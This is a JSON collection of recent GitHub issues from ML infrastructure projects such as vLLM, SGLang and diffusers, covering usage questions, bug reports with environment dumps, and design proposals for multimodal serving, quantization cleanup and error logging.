[ { "repo": "vllm-project/vllm", "number": 31787, "title": "[Usage]: How to set different attention backend for prefill and decode phases?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Alibaba Cloud Linux 3 (Soaring Falcon) (x86_64)\nGCC version : (GCC) 10.2.1 20200825 (Alibaba 10.2.1-3.8 2.32)\nClang version : Could not collect\nCMake version : version 3.31.2\nLibc version : glibc-2.32\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.32\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 535.183.06\ncuDNN version : Probably one of the following:\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_adv.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_cnn.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_graph.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_ops.so.9.7.1\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\n\u67b6\u6784\uff1a x86_64\nCPU \u8fd0\u884c\u6a21\u5f0f\uff1a 32-bit, 64-bit\n\u5b57\u8282\u5e8f\uff1a Little Endian\nCPU: 192\n\u5728\u7ebf CPU \u5217\u8868\uff1a 0-191\n\u6bcf\u4e2a\u6838\u7684\u7ebf\u7a0b\u6570\uff1a 2\n\u6bcf\u4e2a\u5ea7\u7684\u6838\u6570\uff1a 48\n\u5ea7\uff1a 2\nNUMA \u8282\u70b9\uff1a 2\n\u5382\u5546 ID\uff1a GenuineIntel\nCPU \u7cfb\u5217\uff1a 6\n\u578b\u53f7\uff1a 143\n\u578b\u53f7\u540d\u79f0\uff1a Intel(R) Xeon(R) Platinum 8469C\n\u6b65\u8fdb\uff1a 8\nCPU MHz\uff1a 3100.000\nCPU \u6700\u5927 MHz\uff1a 3800.0000\nCPU \u6700\u5c0f MHz\uff1a 800.0000\nBogoMIPS\uff1a 5200.00\n\u865a\u62df\u5316\uff1a VT-x\nL1d \u7f13\u5b58\uff1a 48K\nL1i \u7f13\u5b58\uff1a 32K\nL2 \u7f13\u5b58\uff1a 2048K\nL3 \u7f13\u5b58\uff1a 99840K\nNUMA \u8282\u70b90 CPU\uff1a 0-47,96-143\nNUMA \u8282\u70b91 CPU\uff1a 48-95,144-191\n\u6807\u8bb0\uff1a fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.4.1\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.15.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.2.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.3\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.8.0\n[pip3] torch_memory_saver==0.0.9\n[pip3] torchao==0.9.0\n[pip3] torchaudio==2.8.0\n[pip3] torchvision==0.23.0\n[pip3] transformers==4.57.1\n[pip3] triton==3.4.0\n[conda] flashinfer-python 0.", "url": "https://github.com/vllm-project/vllm/issues/31787", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-06T07:33:18Z", "updated_at": "2026-01-06T07:33:18Z", "comments": 0, "user": "stormchasingg" }, { "repo": "sgl-project/sglang", "number": 16546, "title": "[RFC] SGLang-Omni Design", "body": "API Design: @shuaills \nProposal Draft: @FrankLeeeee @sleepcoo \n\n\n## Motivation\n\nRecent models, no matter open-source or proprietary, have the tendency to become more multi-modal than ever before. That is, models have the ability to process data in more than two modalities. For example, Gemini can have inputs of text, image, video and audio and can output text, image and audio as well. In the open-source domain, Qwen-Omni can do something similar as well. In several openly held talks, researchers from tech giants have expressed their expectation of omni-style models in the coming year 2026. Therefore, the SGLang team thinks that it will be important to introduce new modules to accommodate these coming models.\n\n## Background\n\nAn omni model is typically featured by multi-modal inputs and multi-modal outputs. An example of Qwen/Qwen2.5-Omni-7B is given below. The model can take text, audio and video as inputs and output text and audio.\n\n\"Image\"\n\n## Design Considerations\n\n### Stage Placement\n\nCompared to LLM, one significant characteristic of omni-style model is that it has much more component models. For example, Qwen2.5-Omni has 6 components (2 encoders, thinker, talker, codec decoder). Thus, one particular challenge of omni model is how to place these components. Some questions can be raised when placing these models:\n1. In what case we put all components in one process?\n2. In what case we disaggregate the components?\n3. How to support flexible placements?\n4. How to support replicated replacement? For example, we want to host N instances of talker and M instances of thinkers for a single deployment and how should we do it?\n\n### Data Flow Control\n\nOmni models have more data flow paths compared to LLMs or diffusion models. For example, Qwen2.5-Omni can have 8 ways of using this model. This drastically increases the complexity for system design for this kind of model, espeically for scheduling.\n\n\nInputs | Outputs\n-- | --\nText | Text\nText + Vision | Text\nText + Audio | Text\nText + Vision + Audio | Text\nText | Text + Audio\nText + Vision | Text + Audio\nText + Audio | Text + Audio\nText + Vision + Audio | Text + Audio\n\n\n## Design Details\n\n\"Image\"\n\n### Intra and Inter Disaggregation\n\nWhen it comes to more than 1 component models, an intuitive thought is to place each stage on a distinct process which exclusively owns one or more independent GPUs. However, disaggregation can also occur within the stage, for example, we might place different encoders on different processes for the encoding stage, another example is PD disggregation in LLMs. Thus, we can simplify the design with inter- and intra-disaggregation and re-use the existing implementations of PD disaggregation in SGLang.\n- Inter-Disaggregation: We split the entire model into multiple stages and each stage runs its own scheduling and execution logic. The tensors are communicated between stages via Mooncake or shared memory.\n- Intra-Disaggregation: The model(s) in the same stage are split into multiple processes, e.g. PD Disaggregation. The implementation is not controlled by SGLang-Omni directly and it is only required for the stage to place their outputs into the message queue for the next stage to retrieve. In this way, the developer can customize their own way of intra-stage disaggregation and re-use some of the existing schemes.\n\n### Multi-Scheduling\n\nEach stage can have its own scheduling strategies, e.g. Continuous batching, static grouping, etc. \n\n### Multi-Path\n\nAs omni models have various data flows, we need to group them by type first:\n\n\nType | Description | Example | How to handle it?\n-- | -- | -- | --\nEarly End | The execution stops at an intermediate stage | when the qwen-omni model only outputs text, it does not need to go through the audio module. | We need to create a P2P connection from the all potential endings stages to the main process so that we can pass the data directly without going through unrequired stages.\nCyclic Flow | The data might be transfered to the previous stage | VibeVoice implements a cyclic dataflow where the diffusion head's output is fed back to the LLM for the next generation step, creating a continuous loop during inference. | We can specify the destination to the previous stage in object message queue\nMultiple Receivers | A stage's output needs to be sent to multiple receiving stages. | Fun-Audio-Chat: During generation, the hidden states from the shared LLM layer are passed in parallel to a Text Head for text token prediction and a Speech Refined Head (SRH) to generate high-quality speech tokens at 25Hz resolution. | We can specify multiple destinations in object message queue\n\n## Multi-instance\n\nDue to the presence of multiple component models, it can be observed that eac", "url": "https://github.com/sgl-project/sglang/issues/16546", "state": "open", "labels": [], "created_at": "2026-01-06T06:23:37Z", "updated_at": "2026-01-06T07:14:36Z", "comments": 0, "user": "FrankLeeeee" }, { "repo": "vllm-project/vllm", "number": 31766, "title": "[Docs] Feedback for `/en/latest/contributing/profiling/`", "body": "### \ud83d\udcda The doc issue\n\nWhen I follow this doc and run OpenAI Server[\u00b6](https://docs.vllm.ai/en/latest/contributing/profiling/#openai-server), I found \n> usage: vllm [-h] [-v] {chat,complete,serve,bench,collect-env,run-batch} ...\n> vllm: error: unrecognized arguments: --profiler-config {\"profiler\": \"torch\", \"torch_profiler_dir\": \"/workspace/vllm_profile\"} \n\nI want to know if this update in the newer version?\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31766", "state": "open", "labels": [ "documentation" ], "created_at": "2026-01-06T03:15:37Z", "updated_at": "2026-01-06T03:15:37Z", "comments": 0, "user": "cyk2018" }, { "repo": "huggingface/tokenizers", "number": 1926, "title": "[bug] Why is Apple's development for computers with Inter chips not supported in versions above 0.30.0", "body": "Why is Apple's development for computers with Inter chips not supported in versions above 0.30.0\uff1f", "url": "https://github.com/huggingface/tokenizers/issues/1926", "state": "open", "labels": [], "created_at": "2026-01-06T03:11:35Z", "updated_at": "2026-01-06T03:18:03Z", "comments": 1, "user": "sustly" }, { "repo": "sgl-project/sglang", "number": 16530, "title": "[Bug] DecodingStage VRAM usage surges dramatically", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nPeak GPU memory: 21.18 GB, Remaining GPU memory at peak: 18.82 GB. Components that can stay resident: ['text_encoder', 'vae', 'transformer']\n[01-06 02:01:47] Failed to generate output for prompt 1: CUDA out of memory. Tried to allocate 1.22 GiB. GPU 0 has a total capacity of 39.49 GiB of which 371.00 MiB is free. Including non-PyTorch memory, this process has 2.92 GiB memory in use. Process 35135 has 36.14 GiB memory in use. Of the allocated memory 2.44 GiB is allocated by PyTorch, and 0 bytes is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\nTraceback (most recent call last):\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/utils/logging_utils.py\", line 466, in log_generation_timer\n yield timer\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/entrypoints/diffusion_generator.py\", line 231, in generate\n frames = post_process_sample(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/entrypoints/utils.py\", line 73, in post_process_sample\n sample = (sample * 255).clamp(0, 255).to(torch.uint8)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\ntorch.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.22 GiB. GPU 0 has a total capacity of 39.49 GiB of which 371.00 MiB is free. Including non-PyTorch memory, this process has 2.92 GiB memory in use. Process 35135 has 36.14 GiB memory in use. Of the allocated memory 2.44 GiB is allocated by PyTorch, and 0 bytes is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n[01-06 02:01:47] Completed batch processing. Generated 0 outputs in 375.74 seconds.\n[01-06 02:01:47] Generator was garbage collected without being shut down. Attempting to shut down the local server and client.\n/usr/lib/python3.12/multiprocessing/resource_tracker.py:254: UserWarning: resource_tracker: There appear to be 1 leaked semaphore objects to clean up at shutdown\n\n\n### Reproduction\n\nsglang generate --model-path /data/models/Wan2.2-TI2V-5B-Diffusers --text-encoder-precisions bf16 --dit-precision bf16 --vae-precision fp32 --dit-cpu-offload --vae-cpu-offload --text-encoder-cpu-offload --image-encoder-cpu-offload --pin-cpu-memory --num-gpus 1 --prompt \"Two anthropomorphic cats in comfy boxing gear and bright gloves fight intensely on a spotlighted stage.\" --num-frames 121 --fps 24 --num-inference-steps 50 --save-output --output-path output --output-file-name wan_ti2v.mp4 --dit-layerwise-offload\n\n### Environment\n\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0,1,2,3: NVIDIA A100-PCIE-40GB\nGPU 0,1,2,3 Compute Capability: 8.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 590.44.01\nPyTorch: 2.9.1+cu129\nsglang: 0.5.7\nsgl_kernel: 0.3.20\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: 0.5.3+cu129\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.4.0\naiohttp: 3.13.2\nfastapi: 0.128.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.2.1\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n\tGPU0\tGPU1\tGPU2\tGPU3\tNIC0\tNIC1\tNIC2\tNIC3\tNIC4\tNIC5\tNIC6\tNIC7\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\nGPU0\t X \tPIX\tSYS\tSYS\tNODE\tNODE\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t0-27,56-83\t0\t\tN/A\nGPU1\tPIX\t X \tSYS\tSYS\tNODE\tNODE\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t0-27,56-83\t0\t\tN/A\nGPU2\tSYS\tSYS\t X \tPIX\tSYS\tSYS\tSYS\tSYS\tPIX\tPIX\tNODE\tNODE\t28-55,84-111\t1\t\tN/A\nGPU3\tSYS\tSYS\tPIX\t X \tSYS\tSYS\tSYS\tSYS\tPIX\tPIX\tNODE\tNODE\t28-55,84-111\t1\t\tN/A\nNIC0\tNODE\tNODE\tSYS\tSYS\t X \tPIX\tNODE\tNODE\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC1\tNODE\tNODE\tSYS\tSYS\tPIX\t X \tNODE\tNODE\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC2\tPIX\tPIX\tSYS\tSYS\tNODE\tNODE\t X \tPIX\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC3\tPIX\tPIX\tSYS\tSYS\tNODE\tNODE\tPIX\t X \tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC4\tSYS\tSYS\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t X \tPIX\tNODE\tNODE\t\t\t\t\nNIC5\tSYS\tSYS\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t", "url": "https://github.com/sgl-project/sglang/issues/16530", "state": "open", "labels": [], "created_at": "2026-01-06T02:15:16Z", "updated_at": "2026-01-06T02:15:16Z", "comments": 0, "user": "carloszhang999" }, { "repo": "huggingface/lerobot", "number": 2753, "title": "Debugging poor eval with SmoVLA and two cameras.", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n- Lerobot running on a Jetson Orin nano Super\n- Model trained on a 4090\n- SO-ARM-101 model.\n- two cameras setup (wrist and top view)\n```\n\n### Description\n\nI just trained a 30K steps SmoVLA model from a 73 episodes dataset (which are a 2 merged datasets I had). These two datasets were used the same SO-ARM-101 with two set of cameras (wrist and top).\nI downloaded from HF the model and after a couple of hiccups because of the missing third camera I made it run on my Jetson Orin Nano Super (the machine I'm using for the robot, the training is on my 4090).\nBut the arm just moved a centimeter and then kept idle.\n\nI'm trying to debug what could have caused this:\nIt was because I'm running on my Jetson and SMOLVLA is too much for this little board? (I don't think so, but maybe?)\nMaybe merging the datasets created more noise than helped? (the datasets were recorded in different times of the day)\nthe fact that I only have two cameras and had to remap the cameras and create a dummy third camera for the third camera parameter might have confused the model?\n\nanyone has any insight to give? Thanks in advance!\n\n### Context & Reproduction\n\ncollected datasets (two datasets)\nmerged datasets into one and uploaded to HF\ntrained a model based on smovla-base (had to create a dummy camera for the third camera)\nrun on the jetson orin the trained model.\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2753", "state": "open", "labels": [ "question", "policies", "dataset", "sensors", "training", "evaluation" ], "created_at": "2026-01-05T18:25:13Z", "updated_at": "2026-01-05T18:25:27Z", "user": "vettorazi" }, { "repo": "vllm-project/vllm", "number": 31726, "title": "[Usage]: Why does `vllm serve` keep filling up my system disk when loading a model from a network mount?", "body": "\n### Your current environment\n```\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.10 (main, Oct 3 2024, 07:29:13) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.10.134-18.0.5.lifsea8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 560.35.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.9.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8469C\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ibrs_enhanced fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 wbnoinvd ida arat hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk amx_bf16 avx512_fp16 amx_tile amx_int8 arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 195 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-95\nNUMA node1 CPU(s): 96-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] botorch==0.8.5\n[pip3] flashinfer-py", "url": "https://github.com/vllm-project/vllm/issues/31726", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-05T14:50:19Z", "updated_at": "2026-01-05T15:30:39Z", "comments": 5, "user": "tingjun-cs" }, { "repo": "huggingface/diffusers", "number": 12913, "title": "Is Lumina2Pipeline's mu calculation correct?", "body": "### Describe the bug\n\nDescription\n\nWhile reviewing the current main-branch implementation of pipeline_lumina2, I noticed a potential bug in the calculation of mu within the pipeline's __call__.\n\nIn the following section of the code:\n\nhttps://github.com/huggingface/diffusers/blob/5ffb65803d0ddc5e3298c35df638ceed5e580922/src/diffusers/pipelines/lumina2/pipeline_lumina2.py#L484-L503\n\nThe latent tensor appears to have the shape:\n\n(batch_size, num_channels_latents, height, width)\n\n\nHowever, later in the same file:\n\nhttps://github.com/huggingface/diffusers/blob/5ffb65803d0ddc5e3298c35df638ceed5e580922/src/diffusers/pipelines/lumina2/pipeline_lumina2.py#L699-L706\n\nthe value latent.shape[1] (i.e., num_channels_latents) is passed as the argument for image_seq_len when computing mu.\nThis seems incorrect, since image_seq_len should represent the number of image tokens or sequence length, not the number of latent channels.\n\nExpected Behavior\n\nimage_seq_len should likely correspond to the number of spatial tokens derived from (height, width) (or another tokenization step), rather than the number of latent channels.\n\nActual Behavior\n\nThe current implementation uses latent.shape[1] as image_seq_len, which likely leads to unintended behavior in the computation of mu and subsequent sampling steps.\n\nSuggested Fix\n\nReview the logic where image_seq_len is passed, and ensure it reflects the correct sequence length dimension (possibly derived from spatial resolution or token count, rather than channel count).\n\n### Reproduction\n\nAt the moment, I don\u2019t have a copy/paste runnable MRE because this was identified via manual logic review rather than reproducing the behavior in a runtime environment.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nDiffusers==0.36.0\nPython==3.13\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12913", "state": "open", "labels": [ "bug" ], "created_at": "2026-01-05T14:30:01Z", "updated_at": "2026-01-05T18:07:36Z", "comments": 1, "user": "hwangdonghyun" }, { "repo": "vllm-project/vllm", "number": 31689, "title": "[Feature][Quantization][Help Wanted]: Clean up GPTQ + AWQ Quantization", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe are in process of cleaning up the quantization integrations in vllm (see the FusedMoE refactor PRs I am working on)\n\nIn general, this means we are trying to separate concerns of the quantization INTEGRATION (on disk format --- responsible for weight loading) from the quantization KERNEL (runtime format --- responsible for executing at runtime).\n\nFor GPTQ/AWQ, we have tech debt in that we have different quantization integrations (`gptq.py`, `gptq_marlin.py`, `awq.py`, `awq_marlin.py`, `wna16.py`, `cpuwna16.py`) and we use the `override_quantization_method` to select between them during initialization. This is generally hard to follow and is not adhereing to the abstractions we have in vllm.\n\nCurrently, some (but not all) quantization schemes follow the proper abstractions, where we have a full separating of concerns. Examples are:\n- [Fp8Moe](https://github.com/vllm-project/vllm/blob/b53b89fdb3f4a857eabee5091187cfa937502711/vllm/model_executor/layers/quantization/fp8.py#L722) which follows the proper structure to run a variety of different kernels hooked up to fp8 models\n- [CompressedTensorsWNA16](https://github.com/vllm-project/vllm/blob/b53b89fdb3f4a857eabee5091187cfa937502711/vllm/model_executor/layers/quantization/compressed_tensors/schemes/compressed_tensors_wNa16.py) which follows the proper structure to run a variety of different kernels hooked up to wna16 models\n\nWe need to apply this to gptq and awq.\n\n> WARNING: this is a significant undertaking and will be scrutinized heavily for code quality. The PR author should reach out to @robertgshaw2-redhat in slack to discuss design and on-going progress during the PR creation.\n\nThanks in advance for any help!!!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31689", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2026-01-04T20:56:04Z", "updated_at": "2026-01-06T04:42:19Z", "comments": 7, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31683, "title": "[Feature]: Error Logging Redesign", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nvLLM has a multiprocess architecture with:\n- API Server --> EngineCore --> [N] Workers\n\nAs a result, clean error message logging is challenging, since the error in the API server that occurs will often not be the root cause error. An example of this is at startup time:\n\n```\n(vllm) [robertgshaw2-redhat@nm-automation-h100-standalone-1-preserve vllm]$ just launch_cutlass_tensor\nVLLM_USE_DEEP_GEMM=0 VLLM_USE_FLASHINFER_MOE_FP8=1 VLLM_FLASHINFER_MOE_BACKEND=throughput chg run --gpus 2 -- vllm serve amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV -tp 2 --port 8002 --max-model-len 8192\nReserved 2 GPU(s): [1 3] for command execution\n(APIServer pid=116718) INFO 01-04 14:48:03 [api_server.py:1277] vLLM API server version 0.13.0rc2.dev185+g00a8d7628\n(APIServer pid=116718) INFO 01-04 14:48:03 [utils.py:253] non-default args: {'model_tag': 'amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', 'port': 8002, 'model': 'amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV', 'max_model_len': 8192, 'tensor_parallel_size': 2}\n(APIServer pid=116718) INFO 01-04 14:48:04 [model.py:522] Resolved architecture: MixtralForCausalLM\n(APIServer pid=116718) INFO 01-04 14:48:04 [model.py:1510] Using max model len 8192\n(APIServer pid=116718) WARNING 01-04 14:48:04 [vllm.py:1453] Current vLLM config is not set.\n(APIServer pid=116718) INFO 01-04 14:48:04 [scheduler.py:231] Chunked prefill is enabled with max_num_batched_tokens=2048.\n(APIServer pid=116718) INFO 01-04 14:48:04 [vllm.py:635] Disabling NCCL for DP synchronization when using async scheduling.\n(APIServer pid=116718) 